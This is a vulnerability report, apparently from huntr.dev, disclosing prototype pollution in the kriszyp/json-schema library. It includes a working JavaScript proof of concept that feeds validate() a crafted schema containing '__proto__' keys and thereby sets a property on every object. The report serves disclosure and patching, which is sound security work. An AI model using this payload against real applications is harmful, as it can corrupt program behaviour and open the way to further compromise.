Lucene search

K
huntrYoshino-sBB6CCD63-F505-4E3A-B55F-CD2662C261A9
HistoryOct 03, 2021 - 1:08 p.m.

Prototype Pollution in kriszyp/json-schema

2021-10-0313:08:43
yoshino-s
www.huntr.dev
32

EPSS

0.005

Percentile

75.6%

Description

A constructed payload sent to validate will lead to prototype pollution.

Proof of Concept

// PoC.js
const { validate } = require("json-schema");
const instance = JSON.parse(`
{
  "$schema":{
    "type": "object",
    "properties":{
      "__proto__": {
        "type": "object",
        
        "properties":{
          "polluted": {
              "type": "string",
              "default": "polluted"
          }
        }
      }
    },
    "__proto__": {}
  }
}`);

const a = {};
console.log(a.polluted);
validate(instance);
console.log(a.polluted);

Impact

This vulnerability is capable of make prototype pollution